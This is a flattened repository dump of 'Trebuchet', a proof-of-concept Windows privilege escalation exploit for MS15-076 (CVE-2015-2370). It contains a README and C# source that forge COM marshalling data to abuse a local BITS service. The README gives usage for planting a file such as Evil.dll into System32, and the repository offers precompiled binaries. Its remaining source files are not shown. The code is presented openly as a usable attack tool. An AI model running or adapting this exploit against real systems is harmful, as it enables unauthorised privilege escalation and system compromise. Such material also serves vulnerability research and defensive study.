├── .vs └── Trebuchet │ └── v14 │ └── .suo ├── Binary ├── Microsoft.VisualStudio.OLE.Interop.dll └── Trebuchet.exe ├── LICENSE ├── README.md ├── Trebuchet.sln └── Trebuchet ├── ComInterfaces.cs ├── ComUtils.cs ├── Microsoft.VisualStudio.OLE.Interop.dll ├── PackageBuilder.cs ├── Program.cs ├── Properties ├── AssemblyInfo.cs ├── Resources.Designer.cs └── Resources.resx ├── Resources ├── CreateSymlinkx64.exe └── CreateSymlinkx86.exe ├── Trebuchet.csproj ├── bin └── Release │ ├── Microsoft.VisualStudio.OLE.Interop.dll │ ├── Trebuchet.exe │ ├── Trebuchet.pdb │ ├── Trebuchet.vshost.exe │ └── Trebuchet.vshost.exe.manifest ├── obj ├── Debug │ ├── DesignTimeResolveAssemblyReferences.cache │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Poc_DCERPCNTLMReflection_EoP.Properties.Resources.resources │ ├── Poc_DCERPCNTLMReflection_EoP.csproj.FileListAbsolute.txt │ ├── Poc_DCERPCNTLMReflection_EoP.csproj.GenerateResource.Cache │ ├── Poc_DCERPCNTLMReflection_EoP.csprojResolveAssemblyReference.cache │ ├── Poc_DCERPCNTLMReflection_EoP.exe │ ├── Poc_DCERPCNTLMReflection_EoP.pdb │ ├── TempPE │ │ └── Properties.Resources.Designer.cs.dll │ ├── Trebuchet.Properties.Resources.resources │ ├── Trebuchet.csproj.FileListAbsolute.txt │ ├── Trebuchet.csproj.GenerateResource.Cache │ ├── Trebuchet.csprojResolveAssemblyReference.cache │ ├── Trebuchet.exe │ ├── Trebuchet.pdb │ └── build.force └── Release │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── TempPE │ └── Properties.Resources.Designer.cs.dll │ ├── Trebuchet.Properties.Resources.resources │ ├── Trebuchet.csproj.FileListAbsolute.txt │ ├── Trebuchet.csproj.GenerateResource.Cache │ ├── Trebuchet.csprojResolveAssemblyReference.cache │ ├── Trebuchet.exe │ └── Trebuchet.pdb └── request.bin /.vs/Trebuchet/v14/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/.vs/Trebuchet/v14/.suo -------------------------------------------------------------------------------- /Binary/Microsoft.VisualStudio.OLE.Interop.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Binary/Microsoft.VisualStudio.OLE.Interop.dll -------------------------------------------------------------------------------- /Binary/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Binary/Trebuchet.exe -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright {yyyy} {name of copyright owner} 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Trebuchet 2 | #####MS15-076 (CVE-2015-2370) Privilege Escalation 3 | ######Copies a file to any privileged location on disk 4 | 5 | Compiled with VS2015, precompiled exe in Binary directory 6 | 7 | Usage: trebuchet.exe C:\Users\Bob\Evil.txt C:\Windows\System32\Evil.dll 8 | 9 | This is a lightly modified Proof of Concept by James Forshaw with Google, found here: https://code.google.com/p/google-security-research/issues/detail?id=325 10 | 11 | CreateSymlink tool was written by James Forshaw found here: 12 | https://github.com/google/symboliclink-testing-tools 13 | 14 | Notes: 15 | - Microsoft.VisualStudio.OLE.Inerop.dll must be in the same directory 16 | - Exploit can only be one once every 2-3 minutes. This is because RPC can be help up by LocalSystem 17 | - Tested on x64/x86 Windows 7/8.1 18 | -------------------------------------------------------------------------------- /Trebuchet.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.22823.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Trebuchet", "Trebuchet\Trebuchet.csproj", "{02385F73-4546-4193-A112-EF17E4EADA62}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {02385F73-4546-4193-A112-EF17E4EADA62}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {02385F73-4546-4193-A112-EF17E4EADA62}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {02385F73-4546-4193-A112-EF17E4EADA62}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {02385F73-4546-4193-A112-EF17E4EADA62}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /Trebuchet/ComInterfaces.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.VisualStudio.OLE.Interop; 2 | using System; 3 | using IS = System.Runtime.InteropServices; 4 | 5 | namespace Trebuchet 6 | { 7 | [IS.ComVisible(true)] 8 | public class TestClass : IMarshal, IStorage 9 | { 10 | private IStorage _stg; 11 | private string _binding; 12 | 13 | public TestClass(IStorage stg, string binding) 14 | { 15 | _stg = stg; 16 | _binding = binding; 17 | } 18 | 19 | public void DisconnectObject(uint dwReserved) 20 | { 21 | } 22 | 23 | public void GetMarshalSizeMax(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out uint pSize) 24 | { 25 | pSize = 1024; 26 | } 27 | 28 | public void GetUnmarshalClass(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out Guid pCid) 29 | { 30 | pCid = new Guid("00000306-0000-0000-c000-000000000046"); 31 | } 32 | 33 | public void MarshalInterface(IStream pstm, ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS) 34 | { 35 | uint written; 36 | byte[] data = ComUtils.CreateStandardMarshal(_binding); 37 | 38 | pstm.Write(data, (uint)data.Length, out written); 39 | } 40 | 41 | public void ReleaseMarshalData(IStream pstm) 42 | { 43 | } 44 | 45 | public void UnmarshalInterface(IStream pstm, ref Guid riid, out IntPtr ppv) 46 | { 47 | ppv = IntPtr.Zero; 48 | } 49 | 50 | public void Commit(uint grfCommitFlags) 51 | { 52 | _stg.Commit(grfCommitFlags); 53 | } 54 | 55 | public void CopyTo(uint ciidExclude, Guid[] rgiidExclude, IntPtr snbExclude, IStorage pstgDest) 56 | { 57 | _stg.CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest); 58 | } 59 | 60 | public void CreateStorage(string pwcsName, uint grfMode, uint reserved1, uint reserved2, out IStorage ppstg) 61 | { 62 | _stg.CreateStorage(pwcsName, grfMode, reserved1, reserved2, out ppstg); 63 | } 64 | 65 | public void CreateStream(string pwcsName, uint grfMode, uint reserved1, uint reserved2, out IStream ppstm) 66 | { 67 | _stg.CreateStream(pwcsName, grfMode, reserved1, reserved2, out ppstm); 68 | } 69 | 70 | public void DestroyElement(string pwcsName) 71 | { 72 | _stg.DestroyElement(pwcsName); 73 | } 74 | 75 | public void EnumElements(uint reserved1, IntPtr reserved2, uint reserved3, out IEnumSTATSTG ppEnum) 76 | { 77 | _stg.EnumElements(reserved1, reserved2, reserved3, out ppEnum); 78 | } 79 | 80 | public void MoveElementTo(string pwcsName, IStorage pstgDest, string pwcsNewName, uint grfFlags) 81 | { 82 | _stg.MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags); 83 | } 84 | 85 | public void OpenStorage(string pwcsName, IStorage pstgPriority, uint grfMode, IntPtr snbExclude, uint reserved, out IStorage ppstg) 86 | { 87 | _stg.OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, out ppstg); 88 | } 89 | 90 | public void OpenStream(string pwcsName, IntPtr reserved1, uint grfMode, uint reserved2, out IStream ppstm) 91 | { 92 | _stg.OpenStream(pwcsName, reserved1, grfMode, reserved2, out ppstm); 93 | } 94 | 95 | public void RenameElement(string pwcsOldName, string pwcsNewName) 96 | { 97 | 98 | } 99 | 100 | public void Revert() 101 | { 102 | 103 | } 104 | 105 | public void SetClass(ref Guid clsid) 106 | { 107 | 108 | } 109 | 110 | public void SetElementTimes(string pwcsName, FILETIME[] pctime, FILETIME[] patime, FILETIME[] pmtime) 111 | { 112 | 113 | } 114 | 115 | public void SetStateBits(uint grfStateBits, uint grfMask) 116 | { 117 | } 118 | 119 | public void Stat(STATSTG[] pstatstg, uint grfStatFlag) 120 | { 121 | _stg.Stat(pstatstg, grfStatFlag); 122 | pstatstg[0].pwcsName = "hello.stg"; 123 | } 124 | } 125 | } -------------------------------------------------------------------------------- /Trebuchet/ComUtils.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.VisualStudio.OLE.Interop; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.IO; 5 | using System.Runtime.InteropServices; 6 | using System.Text; 7 | 8 | namespace Trebuchet 9 | { 10 | static class ComUtils 11 | { 12 | [DllImport("ole32.dll")] 13 | static extern int CreateObjrefMoniker( 14 | IntPtr punk, 15 | out IMoniker ppmk); 16 | 17 | [DllImport("ole32.dll")] 18 | static extern int CreateBindCtx( 19 | int reserved, 20 | out IBindCtx ppbc 21 | ); 22 | 23 | [StructLayout(LayoutKind.Sequential)] 24 | struct MULTI_QI 25 | { 26 | public IntPtr pIID; 27 | [MarshalAs(UnmanagedType.Interface)] 28 | public object pItf; 29 | public int hr; 30 | } 31 | 32 | [Flags] 33 | public enum STGM : int 34 | { 35 | DIRECT = 0x00000000, 36 | TRANSACTED = 0x00010000, 37 | SIMPLE = 0x08000000, 38 | READ = 0x00000000, 39 | WRITE = 0x00000001, 40 | READWRITE = 0x00000002, 41 | SHARE_DENY_NONE = 0x00000040, 42 | SHARE_DENY_READ = 0x00000030, 43 | SHARE_DENY_WRITE = 0x00000020, 44 | SHARE_EXCLUSIVE = 0x00000010, 45 | PRIORITY = 0x00040000, 46 | DELETEONRELEASE = 0x04000000, 47 | NOSCRATCH = 0x00100000, 48 | CREATE = 0x00001000, 49 | CONVERT = 0x00020000, 50 | FAILIFTHERE = 0x00000000, 51 | NOSNAPSHOT = 0x00200000, 52 | DIRECT_SWMR = 0x00400000, 53 | } 54 | 55 | [StructLayout(LayoutKind.Sequential)] 56 | class COSERVERINFO 57 | { 58 | public uint dwReserved1; 59 | [MarshalAs(UnmanagedType.LPWStr)] 60 | public string pwszName; 61 | public IntPtr pAuthInfo; 62 | public uint dwReserved2; 63 | } 64 | 65 | [DllImport("ole32.dll", PreserveSig = false, CharSet = CharSet.Unicode)] 66 | static extern void StgCreateDocfile([MarshalAs(UnmanagedType.LPWStr)] 67 | string pwcsName, STGM grfMode, uint reserved, out IStorage ppstgOpen); 68 | 69 | const uint GMEM_MOVEABLE = 2; 70 | 71 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 72 | static extern IntPtr GlobalAlloc(uint uFlags, UIntPtr dwBytes); 73 | 74 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)] 75 | static extern void CreateILockBytesOnHGlobal( 76 | IntPtr hGlobal, 77 | [MarshalAs(UnmanagedType.Bool)] bool fDeleteOnRelease, 78 | out IntPtr ppLkbyt); 79 | 80 | static IntPtr GuidToPointer(string guid) 81 | { 82 | Guid g = new Guid(guid); 83 | 84 | IntPtr ret = Marshal.AllocCoTaskMem(16); 85 | Marshal.Copy(g.ToByteArray(), 0, ret, 16); 86 | 87 | return ret; 88 | } 89 | 90 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)] 91 | static extern void StgCreateDocfileOnILockBytes( 92 | IntPtr plkbyt, 93 | STGM grfMode, 94 | uint reserved, 95 | out IStorage ppstgOpen); 96 | 97 | public static IntPtr IID_IUnknownPtr = GuidToPointer("00000000-0000-0000-C000-000000000046"); 98 | 99 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)] 100 | static extern void CoGetInstanceFromIStorage(COSERVERINFO pServerInfo, ref Guid pclsid, 101 | [MarshalAs(UnmanagedType.IUnknown)] object pUnkOuter, CLSCTX dwClsCtx, 102 | IStorage pstg, uint cmq, [In, Out] MULTI_QI[] rgmqResults); 103 | 104 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true, CharSet = CharSet.Unicode)] 105 | static extern void CoGetInstanceFromFile( 106 | COSERVERINFO pServerInfo, 107 | ref Guid pClsid, 108 | [MarshalAs(UnmanagedType.IUnknown)] object pUnkOuter, 109 | CLSCTX dwClsCtx, 110 | STGM grfMode, 111 | string pwszName, 112 | uint cmq, 113 | [In, Out] MULTI_QI[] rgmqResults); 114 | 115 | [DllImport("ole32.dll", CharSet = CharSet.Unicode, ExactSpelling = true, PreserveSig = false)] 116 | static extern void CoCreateInstanceEx( 117 | [In, MarshalAs(UnmanagedType.LPStruct)] Guid rclsid, 118 | [MarshalAs(UnmanagedType.IUnknown)] object pUnkOuter, 119 | CLSCTX dwClsCtx, 120 | COSERVERINFO pServerInfo, 121 | uint cmq, 122 | [In, Out] MULTI_QI[] pResults); 123 | 124 | public delegate uint OleStreamMethod(IntPtr a, IntPtr b, uint c); 125 | 126 | [StructLayout(LayoutKind.Sequential)] 127 | public class OLESTREAM 128 | { 129 | [MarshalAs(UnmanagedType.FunctionPtr)] 130 | public OleStreamMethod GetMethod; 131 | [MarshalAs(UnmanagedType.FunctionPtr)] 132 | public OleStreamMethod SetMethod; 133 | } 134 | 135 | [DllImport("ole32.dll", CharSet = CharSet.Unicode, ExactSpelling = true, PreserveSig = false)] 136 | static extern void OleConvertOLESTREAMToIStorage( 137 | ref OLESTREAM lpolestream, 138 | IStorage pstg, 139 | IntPtr ptd); 140 | 141 | [DllImport("Shlwapi.dll", CharSet = CharSet.Unicode, PreserveSig = false)] 142 | static extern void SHCreateStreamOnFile( 143 | string pszFile, 144 | STGM grfMode, 145 | out IStream ppstm 146 | ); 147 | 148 | [Flags] 149 | public enum CLSCTX : uint 150 | { 151 | CLSCTX_INPROC_SERVER = 0x1, 152 | CLSCTX_INPROC_HANDLER = 0x2, 153 | CLSCTX_LOCAL_SERVER = 0x4, 154 | CLSCTX_INPROC_SERVER16 = 0x8, 155 | CLSCTX_REMOTE_SERVER = 0x10, 156 | CLSCTX_INPROC_HANDLER16 = 0x20, 157 | CLSCTX_RESERVED1 = 0x40, 158 | CLSCTX_RESERVED2 = 0x80, 159 | CLSCTX_RESERVED3 = 0x100, 160 | CLSCTX_RESERVED4 = 0x200, 161 | CLSCTX_NO_CODE_DOWNLOAD = 0x400, 162 | CLSCTX_RESERVED5 = 0x800, 163 | CLSCTX_NO_CUSTOM_MARSHAL = 0x1000, 164 | CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000, 165 | CLSCTX_NO_FAILURE_LOG = 0x4000, 166 | CLSCTX_DISABLE_AAA = 0x8000, 167 | CLSCTX_ENABLE_AAA = 0x10000, 168 | CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000, 169 | CLSCTX_ACTIVATE_32_BIT_SERVER = 0x40000, 170 | CLSCTX_ACTIVATE_64_BIT_SERVER = 0x80000, 171 | CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, 172 | CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER, 173 | CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER 174 | } 175 | 176 | static byte[] GenerateStringBindings(IEnumerable names) 177 | { 178 | using (MemoryStream stm = new MemoryStream()) 179 | { 180 | using (BinaryWriter writer = new BinaryWriter(stm)) 181 | { 182 | foreach (string name in names) 183 | { 184 | ushort towerId = 7; 185 | string address = name; 186 | 187 | if (name.StartsWith("@")) 188 | { 189 | string[] v = name.Substring(1).Split(':'); 190 | 191 | if (v.Length != 2) 192 | { 193 | throw new InvalidDataException(String.Format("Invalid name {0}", name)); 194 | } 195 | 196 | towerId = ushort.Parse(v[0]); 197 | address = v[1]; 198 | } 199 | 200 | writer.Write(towerId); 201 | writer.Write(Encoding.Unicode.GetBytes(address + "\0")); 202 | } 203 | 204 | writer.Write((ushort)0); 205 | } 206 | 207 | return stm.ToArray(); 208 | } 209 | } 210 | 211 | static byte[] GenerateSecurityBindings() 212 | { 213 | // RPC_C_AUTHN_WINNT - 0x0A 214 | using (MemoryStream stm = new MemoryStream()) 215 | { 216 | using (BinaryWriter writer = new BinaryWriter(stm)) 217 | { 218 | writer.Write((ushort)0xA); 219 | writer.Write((ushort)0xFFFF); 220 | writer.Write((ushort)0); 221 | 222 | writer.Write((ushort)0); 223 | } 224 | 225 | return stm.ToArray(); 226 | } 227 | } 228 | 229 | static byte[] GenerateDualStringArray(IEnumerable names) 230 | { 231 | byte[] stringBindings = GenerateStringBindings(names); 232 | byte[] securityBindings = GenerateSecurityBindings(); 233 | 234 | using (MemoryStream stm = new MemoryStream()) 235 | { 236 | using (BinaryWriter writer = new BinaryWriter(stm)) 237 | { 238 | ushort totalLength = (ushort)((stringBindings.Length + securityBindings.Length) / 2); 239 | ushort securityOffset = (ushort)(stringBindings.Length / 2); 240 | 241 | writer.Write(totalLength); 242 | writer.Write(securityOffset); 243 | writer.Write(stringBindings); 244 | writer.Write(securityBindings); 245 | } 246 | 247 | return stm.ToArray(); 248 | } 249 | } 250 | 251 | public static byte[] CreateStandardMarshal(params string[] names) 252 | { 253 | Random r = new Random(); 254 | 255 | using (MemoryStream stm = new MemoryStream()) 256 | { 257 | using (BinaryWriter writer = new BinaryWriter(stm)) 258 | { 259 | Guid iid_IUnknown = Guid.Parse("00000000-0000-0000-C000-000000000046"); 260 | 261 | writer.Write(0x574f454d); // MEOW 262 | writer.Write(0x00000001); // OBJREF_STANDARD 263 | writer.Write(iid_IUnknown.ToByteArray()); // IID_IUnknown 264 | 265 | // STANDARD Structure 266 | writer.Write(0); // Flags 267 | writer.Write(1); // cPublicRefs 268 | 269 | // Concatenation of oxid, opid and ipid 270 | byte[] ids = new byte[32]; 271 | 272 | r.NextBytes(ids); 273 | writer.Write(ids); 274 | 275 | writer.Write(GenerateDualStringArray(names)); 276 | } 277 | 278 | return stm.ToArray(); 279 | } 280 | } 281 | 282 | public static IStorage CreateStorage() 283 | { 284 | IntPtr gh = IntPtr.Zero; 285 | IntPtr lb; 286 | IStorage ret; 287 | 288 | ComUtils.CreateILockBytesOnHGlobal(gh, true, out lb); 289 | ComUtils.StgCreateDocfileOnILockBytes(lb, STGM.CREATE | STGM.READWRITE | STGM.SHARE_EXCLUSIVE, 0, out ret); 290 | 291 | return ret; 292 | } 293 | 294 | public static IStorage CreateStorage(string path) 295 | { 296 | IStorage stg; 297 | 298 | ComUtils.StgCreateDocfile(path, STGM.CREATE | STGM.READWRITE | STGM.SHARE_EXCLUSIVE, 0, out stg); 299 | 300 | return stg; 301 | } 302 | 303 | public static IStream CreateStream(string path) 304 | { 305 | IStream stm; 306 | 307 | SHCreateStreamOnFile(path, STGM.READWRITE, out stm); 308 | 309 | return stm; 310 | } 311 | 312 | public const string CLSID_Package = "f20da720-c02f-11ce-927b-0800095ae340"; 313 | 314 | public static IStorage CreatePackageStorage(string name, byte[] filedata) 315 | { 316 | MemoryStream ms = new MemoryStream(PackageBuilder.BuildPackage(@"C:\testme\"+name, filedata)); 317 | IStorage stg = CreateStorage("dump.stg"); 318 | ComUtils.OLESTREAM stm = new ComUtils.OLESTREAM(); 319 | stm.GetMethod = (a, b, c) => 320 | { 321 | //Console.WriteLine("{0} {1} {2}", a, b, c); 322 | 323 | byte[] data = new byte[c]; 324 | 325 | int len = ms.Read(data, 0, (int)c); 326 | 327 | Marshal.Copy(data, 0, b, len); 328 | 329 | return (uint)len; 330 | }; 331 | 332 | OleConvertOLESTREAMToIStorage(ref stm, stg, IntPtr.Zero); 333 | // Console.WriteLine("Creating File..."); 334 | Guid g = new Guid(CLSID_Package); 335 | stg.SetClass(ref g); 336 | 337 | return stg; 338 | } 339 | 340 | public static byte[] GetMarshalledObject(object o) 341 | { 342 | IMoniker mk; 343 | 344 | CreateObjrefMoniker(Marshal.GetIUnknownForObject(o), out mk); 345 | 346 | IBindCtx bc; 347 | 348 | CreateBindCtx(0, out bc); 349 | 350 | string name; 351 | 352 | mk.GetDisplayName(bc, null, out name); 353 | 354 | return Convert.FromBase64String(name.Substring(7).TrimEnd(':')); 355 | } 356 | 357 | public static void BootstrapComMarshal(int port) 358 | { 359 | IStorage stg = ComUtils.CreateStorage(); 360 | 361 | // Use a known local system service COM server, in this cast BITSv1 362 | Guid clsid = new Guid("4991d34b-80a1-4291-83b6-3328366b9097"); 363 | 364 | TestClass c = new TestClass(stg, String.Format("127.0.0.1[{0}]", port)); 365 | 366 | MULTI_QI[] qis = new MULTI_QI[1]; 367 | 368 | qis[0].pIID = ComUtils.IID_IUnknownPtr; 369 | qis[0].pItf = null; 370 | qis[0].hr = 0; 371 | //Console.WriteLine("Converting the Data!"); 372 | try 373 | { 374 | CoGetInstanceFromIStorage(null, ref clsid, 375 | null, CLSCTX.CLSCTX_LOCAL_SERVER, c, 1, qis); 376 | } 377 | catch 378 | { 379 | //Console.WriteLine("Caught it!"); 380 | } 381 | //Console.WriteLine("Finished with BootStrap!"); 382 | } 383 | } 384 | } 385 | -------------------------------------------------------------------------------- /Trebuchet/Microsoft.VisualStudio.OLE.Interop.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/Microsoft.VisualStudio.OLE.Interop.dll -------------------------------------------------------------------------------- 